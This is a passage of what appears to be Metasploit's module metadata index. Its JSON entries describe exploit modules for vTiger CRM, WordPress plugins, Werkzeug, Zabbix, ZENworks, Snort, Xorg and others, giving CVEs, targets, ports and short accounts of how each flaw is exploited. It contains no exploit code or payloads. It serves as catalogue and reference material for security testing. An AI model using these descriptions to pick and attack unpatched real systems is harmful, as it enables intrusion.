"Touhid M.Shaikh <touhidshaikh22@gmail.com>",
"SecureLayer7.net"
],
"description": "Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo.\n Instead of uploading an image, an attacker may choose to upload a file containing PHP code and\n run this code by accessing the resulting PHP file.\n\n This module was tested against vTiger CRM v6.3.0.",
"references": [
"CVE-2015-6000",
"CVE-2016-1713",
"EDB-38345"
],
"platform": "PHP",
"arch": "php",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"vTiger CRM v6.3.0"
],
"mod_time": "2018-07-30 12:15:59 +0000",
"path": "/modules/exploits/multi/http/vtiger_logo_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_logo_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/vtiger_php_exec": {
"name": "vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution",
"full_name": "exploit/multi/http/vtiger_php_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "vTiger CRM allows an authenticated user to upload files to embed within documents.\n Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP\n script and execute arbitrary PHP code remotely.\n\n This module was tested against vTiger CRM v5.4.0 and v5.3.0.",
"references": [
"CVE-2013-3591",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/multi/http/vtiger_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_php_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/vtiger_soap_upload": {
"name": "vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",
"full_name": "exploit/multi/http/vtiger_soap_upload",
"rank": 600,
"disclosure_date": "2013-03-26",
"type": "exploit",
"author": [
"Egidio Romano",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "vTiger CRM allows a user to bypass authentication when requesting SOAP services.\n In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP\n service. By combining both vulnerabilities an attacker can upload and execute PHP\n code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu\n 10.04 and Windows 2003 SP2.",
"references": [
"CVE-2013-3214",
"CVE-2013-3215",
"OSVDB-95902",
"OSVDB-95903",
"BID-61558",
"BID-61559",
"EDB-27279",
"URL-http://karmainsecurity.com/KIS-2013-07",
"URL-http://karmainsecurity.com/KIS-2013-08"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"vTigerCRM v5.4.0"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/vtiger_soap_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_soap_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/webnms_file_upload": {
"name": "WebNMS Framework Server Arbitrary File Upload",
"full_name": "exploit/multi/http/webnms_file_upload",
"rank": 600,
"disclosure_date": "2016-07-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\nunauthenticated user to upload text files by using a directory traversal attack\non the FileUploadServlet servlet. A JSP file can be uploaded that then drops and\nexecutes a malicious payload, achieving code execution under the user which the\nWebNMS server is running.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"references": [
"CVE-2016-6600",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
"URL-https://seclists.org/fulldisclosure/2016/Aug/54"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"WebNMS Framework Server 5.2 / 5.2 SP1 - Linux",
"WebNMS Framework Server 5.2 / 5.2 SP1 - Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/webnms_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/webnms_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/webpagetest_upload_exec": {
"name": "WebPageTest Arbitrary PHP File Upload",
"full_name": "exploit/multi/http/webpagetest_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-13",
"type": "exploit",
"author": [
"dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in WebPageTest's Upload Feature. By\n default, the resultimage.php file does not verify the user-supplied item before\n saving it to disk, and then places this item in the web directory accessible by\n remote users. This flaw can be abused to gain remote code execution.",
"references": [
"OSVDB-83822",
"EDB-19790"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WebPageTest v2.6 or older"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/webpagetest_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/webpagetest_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/werkzeug_debug_rce": {
"name": "Werkzeug Debug Shell Command Execution",
"full_name": "exploit/multi/http/werkzeug_debug_rce",
"rank": 600,
"disclosure_date": "2015-06-28",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will exploit the Werkzeug debug console to put down a\n Python shell. This debugger \"must never be used on production\n machines\" but sometimes slips passed testing.\n\n Tested against:\n 0.9.6 on Debian\n 0.9.6 on Centos\n 0.10 on Debian",
"references": [
"URL-http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"werkzeug 0.10 and older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/werkzeug_debug_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/werkzeug_debug_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wikka_spam_exec": {
"name": "WikkaWiki 1.3.2 Spam Logging PHP Injection",
"full_name": "exploit/multi/http/wikka_spam_exec",
"rank": 600,
"disclosure_date": "2011-11-30",
"type": "exploit",
"author": [
"EgiX",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in WikkaWiki. When the spam logging\n feature is enabled, it is possible to inject PHP code into the spam log file via the\n UserAgent header, and then request it to execute our payload. There are at least\n three different ways to trigger spam protection, this module does so by generating\n 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).\n\n Please note that in order to use the injection, you must manually pick a page\n first that allows you to add a comment, and then set it as 'PAGE'.",
"references": [
"CVE-2011-4451",
"OSVDB-77393",
"EDB-18177"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WikkaWiki 1.3.2 r1814"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/wikka_spam_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/wikka_spam_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wp_crop_rce": {
"name": "WordPress Crop-image Shell Upload",
"full_name": "exploit/multi/http/wp_crop_rce",
"rank": 600,
"disclosure_date": "2019-02-19",
"type": "exploit",
"author": [
"RIPSTECH Technology",
"Wilfried Becard <wilfried.becard@synacktiv.com>"
],
"description": "This module exploits a path traversal and a local file inclusion\n vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n The crop-image function allows a user, with at least author privileges,\n to resize an image and perform a path traversal by changing the _wp_attached_file\n reference during the upload. The second part of the exploit will include\n this image in the current theme by changing the _wp_page_template attribute\n when creating a post.\n\n This exploit module only works for Unix-based systems currently.",
"references": [
"CVE-2019-8942",
"CVE-2019-8943",
"URL-https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress"
],
"mod_time": "2019-04-04 15:19:58 +0000",
"path": "/modules/exploits/multi/http/wp_crop_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_crop_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
"name": "WordPress Ninja Forms Unauthenticated File Upload",
"full_name": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",
"rank": 600,
"disclosure_date": "2016-05-04",
"type": "exploit",
"author": [
"James Golovich",
"rastating"
],
"description": "Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain\n an unauthenticated file upload vulnerability, allowing guests\n to upload arbitrary PHP code that can be executed in the context\n of the web server.",
"references": [
"CVE-2016-1209",
"WPVDB-8485",
"URL-http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ninja-forms"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_ninja_forms_unauthenticated_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wp_responsive_thumbnail_slider_upload": {
"name": "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
"full_name": "exploit/multi/http/wp_responsive_thumbnail_slider_upload",
"rank": 600,
"disclosure_date": "2015-08-28",
"type": "exploit",
"author": [
"Arash Khazaei",
"Shelby Pace"
],
"description": "This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider\n Plugin v1.0 for WordPress post authentication.",
"references": [
"EDB-37998"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Responsive Thumbnail Slider Plugin v1.0"
],
"mod_time": "2018-07-26 23:08:20 +0000",
"path": "/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_responsive_thumbnail_slider_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/x7chat2_php_exec": {
"name": "X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",
"full_name": "exploit/multi/http/x7chat2_php_exec",
"rank": 600,
"disclosure_date": "2014-10-27",
"type": "exploit",
"author": [
"Fernando Munoz <fernando@null-life.com>",
"Juan Escobar <eng.jescobar@gmail.com>"
],
"description": "This module exploits a post-auth vulnerability found in X7 Chat versions\n 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which\n uses preg_replace() function with the /e modifier. This allows a remote\n authenticated attacker to execute arbitrary PHP code in the remote machine.",
"references": [
"BID-71014",
"CVE-2014-8998",
"URL-https://github.com/rapid7/metasploit-framework/pull/4076"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/x7chat2_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/x7chat2_php_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zabbix_script_exec": {
"name": "Zabbix Authenticated Remote Command Execution",
"full_name": "exploit/multi/http/zabbix_script_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "ZABBIX allows an administrator to create scripts that will be run on hosts.\n An authenticated attacker can create a script containing a payload, then a host\n with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.\n\n This module was tested against Zabbix v2.0.9.",
"references": [
"CVE-2013-3628",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/zabbix_script_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/zabbix_script_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/zemra_panel_rce": {
"name": "Zemra Botnet CnC Web Panel Remote Code Execution",
"full_name": "exploit/multi/http/zemra_panel_rce",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"Jay Turla <@shipcod3>",
"Angel Injection",
"Darren Martyn <@info_dox>"
],
"description": "This module exploits the CnC web panel of Zemra Botnet which contains a backdoor\n inside its leaked source code. Zemra is a crimeware bot that can be used to\n conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.",
"references": [
"URL-http://0day.today/exploit/19259",
"URL-http://insecurety.net/?p=144",
"URL-http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"zemra panel / Unix",
"zemra panel / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/zemra_panel_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/zemra_panel_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zenworks_configuration_management_upload": {
"name": "Novell ZENworks Configuration Management Arbitrary File Upload",
"full_name": "exploit/multi/http/zenworks_configuration_management_upload",
"rank": 600,
"disclosure_date": "2015-04-07",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in Novell ZENworks Configuration\n Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in\n the UploadServlet which accepts unauthenticated file uploads and does not check the\n \"uid\" parameter for directory traversal characters. This allows an attacker to write\n anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat\n webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack.\n This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note\n that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a\n Metasploit exploit, but it abuses a different parameter of the same servlet.",
"references": [
"CVE-2015-0779",
"OSVDB-120382",
"URL-https://seclists.org/fulldisclosure/2015/Apr/21"
],
"platform": "Java",
"arch": "java",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Novell ZCM < v11.3.2 - Universal Java"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/zenworks_configuration_management_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/zenworks_configuration_management_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zenworks_control_center_upload": {
"name": "Novell ZENworks Configuration Management Remote Execution",
"full_name": "exploit/multi/http/zenworks_control_center_upload",
"rank": 500,
"disclosure_date": "2013-03-22",
"type": "exploit",
"author": [
"James Burton",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Novell ZENworks Configuration\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control\n Center application, allowing an unauthenticated attacker to upload a malicious file\n outside of the TEMP directory and then make a second request that allows for\n arbitrary code execution. This module has been tested successfully on Novell\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\n Linux Enterprise Server 10 SP3.",
"references": [
"CVE-2013-1080",
"BID-58668",
"OSVDB-91627",
"ZDI-13-049",
"URL-http://www.novell.com/support/kb/doc.php?id=7011812"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2",
"ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/zenworks_control_center_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/zenworks_control_center_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zpanel_information_disclosure_rce": {
"name": "Zpanel Remote Unauthenticated RCE",
"full_name": "exploit/multi/http/zpanel_information_disclosure_rce",
"rank": 600,
"disclosure_date": "2014-01-30",
"type": "exploit",
"author": [
"Balazs Makany",
"Jose Antonio Perez",
"dawn isabel",
"brad wolfe",
"brent morris",
"james fitts"
],
"description": "This module exploits an information disclosure vulnerability\n in ZPanel. The vulnerability is due to a vulnerable version\n of pChart used by ZPanel that allows unauthenticated users to read\n arbitrary files remotely on the file system. This particular module\n utilizes this vulnerability to identify the username/password\n combination of the MySQL instance. With the\n credentials the attackers can login to PHPMyAdmin and execute\n SQL commands to drop a malicious payload on the filesystem and\n call it leading to remote code execution.",
"references": [
"EDB-31173",
"OSVDB-102595",
"URL-http://blog.0xlabs.com/2014/03/zpanel-10.1.x-remote-root.html",
"URL-http://pastebin.com/y5Pf4Yms"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/zpanel_information_disclosure_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ids/snort_dce_rpc": {
"name": "Snort 2 DCE/RPC Preprocessor Buffer Overflow",
"full_name": "exploit/multi/ids/snort_dce_rpc",
"rank": 400,
"disclosure_date": "2007-02-19",
"type": "exploit",
"author": [
"Neel Mehta",
"Trirat Puttaraksa",
"Carsten Maartmann-Moe <carsten@carmaa.com>",
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "This module allows remote attackers to execute arbitrary code by exploiting the\n Snort service via crafted SMB traffic. The vulnerability is due to a boundary\n error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,\n which may result a stack-based buffer overflow with a specially crafted packet\n sent on a network that is monitored by Snort.\n\n Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.\n\n Any host on the Snort network may be used as the remote host. The remote host does not\n need to be running the SMB service for the exploit to be successful.",
"references": [
"OSVDB-32094",
"CVE-2006-5276",
"URL-http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html",
"URL-http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html",
"URL-http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 139,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal",
"Redhat 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/ids/snort_dce_rpc.rb",
"is_install_path": true,
"ref_name": "multi/ids/snort_dce_rpc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/local/allwinner_backdoor": {
"name": "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
"full_name": "exploit/multi/local/allwinner_backdoor",
"rank": 600,
"disclosure_date": "2016-04-30",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"KotCzarny"
],
"description": "This module attempts to exploit a debug backdoor privilege escalation in\n Allwinner SoC based devices.\n Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4\n Vulnerable OS: all OS images available for Orange Pis,\n any for FriendlyARM's NanoPi M1,\n SinoVoip's M2+ and M3,\n Cuebietech's Cubietruck +\n Linksprite's pcDuino8 Uno\n Exploitation may be possible against Dragon (x10) and Allwinner Android tablets",
"references": [
"CVE-2016-10225",
"URL-http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/",
"URL-https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us",
"URL-http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"
],
"platform": "Android,Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/local/allwinner_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/local/allwinner_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc": {
"name": "MagniComp SysInfo mcsiwrapper Privilege Escalation",
"full_name": "exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
"rank": 600,
"disclosure_date": "2016-09-23",
"type": "exploit",
"author": [
"Daniel Lawson",
"Romain Trouve",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on systems running\n MagniComp SysInfo versions prior to 10-H64.\n\n The .mcsiwrapper suid executable allows loading a config file using the\n '--configfile' argument. The 'ExecPath' config directive is used to set\n the executable load path. This module abuses this functionality to set\n the load path resulting in execution of arbitrary code as root.\n\n This module has been tested successfully with SysInfo version\n 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
"references": [
"CVE-2017-6516",
"BID-96934",
"URL-http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml",
"URL-https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/",
"URL-https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/"
],
"platform": "Linux,Solaris",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Solaris",
"Linux"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
"is_install_path": true,
"ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/local/xorg_x11_suid_server": {
"name": "Xorg X11 Server SUID logfile Privilege Escalation",
"full_name": "exploit/multi/local/xorg_x11_suid_server",
"rank": 400,
"disclosure_date": "2018-10-25",
"type": "exploit",
"author": [
"Narendra Shinde",
"Raptor - 0xdea",
"Aaron Ringo",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and\n CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS\n and RHEL systems requires console auth for the user's session to start\n the Xorg server.\n\n Cron launches the payload, so if SELinux is enforcing, exploitation\n may still be possible, but the module will bail.\n\n Xorg must have SUID permissions and may not start if already running.\n\n On exploitation a crontab.old backup file will be created by Xorg.\n This module will remove the .old file and restore crontab after\n successful exploitation. Failed exploitation may result in a corrupted\n crontab. On successful exploitation artifacts will be created consistant\n with starting Xorg and running a cron.",
"references": [
"CVE-2018-14665",
"BID-105741",
"EDB-45697",
"EDB-45742",
"EDB-45832",
"URL-https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html",
"URL-https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm"
],
"platform": "Linux,OpenBSD",
"arch": "cmd, x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenBSD",
"Linux x64",
"Linux x86"
],
"mod_time": "2019-04-21 11:21:28 +0000",
"path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
"is_install_path": true,
"ref_name": "multi/local/xorg_x11_suid_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/arkeia_agent_exec": {
"name": "Western Digital Arkeia Remote Code Execution",
"full_name": "exploit/multi/misc/arkeia_agent_exec",
"rank": 500,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.\n The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are\n insufficient checks on the authentication of all clients, this can be bypassed.\n Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or\n SYSTEM privileges.\n The daemon is installed on both the Arkeia server as well on all the backup clients. The module\n has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.",
"references": [
"CVE-2015-7709",
"EDB-37600",
"URL-https://seclists.org/fulldisclosure/2015/Jul/54"
],
"platform": "",
"arch": "",
"rport": 617,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/misc/arkeia_agent_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/arkeia_agent_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/batik_svg_java": {
"name": "Squiggle 1.7 SVG Browser Java Code Execution",
"full_name": "exploit/multi/misc/batik_svg_java",
"rank": 600,
"disclosure_date": "2012-05-11",
"type": "exploit",
"author": [
"Nicolas Gregoire",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the SVG support to execute Java Code in the\n Squiggle Browser included in the Batik framework 1.7 through a\n crafted SVG file referencing a jar file.\n\n In order to gain arbitrary code execution, the browser must meet\n the following conditions: (1) It must support at least SVG version\n 1.1 or newer, (2) It must support Java code and (3) The \"Enforce\n secure scripting\" check must be disabled.\n\n The module has been tested against Windows and Linux platforms.",
"references": [
"OSVDB-81965",
"URL-http://www.agarri.fr/blog/"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/batik_svg_java.rb",
"is_install_path": true,
"ref_name": "multi/misc/batik_svg_java",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/bmc_patrol_cmd_exec": {
"name": "BMC Patrol Agent Privilege Escalation Cmd Execution",
"full_name": "exploit/multi/misc/bmc_patrol_cmd_exec",
"rank": 600,
"disclosure_date": "2019-01-17",
"type": "exploit",
"author": [
"b0yd"
],
"description": "This module leverages the remote command execution feature provided by\n the BMC Patrol Agent software. It can also be used to escalate privileges\n on Windows hosts as the software runs as SYSTEM but only verfies that the password\n of the provided user is correct. This also means if the software is running on a\n domain controller, it can be used to escalate from a normal domain user to domain\n admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses\n powershell to execute the payload. The powershell version tends to timeout on\n the first run so it may take multiple tries.",
"references": [
"CVE-2018-20735",
"URL-https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 3181,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Powershell Injected Shellcode",
"Generic Command Callback"
],
"mod_time": "2019-03-09 12:22:04 +0000",
"path": "/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/bmc_patrol_cmd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/misc/bmc_server_automation_rscd_nsh_rce": {
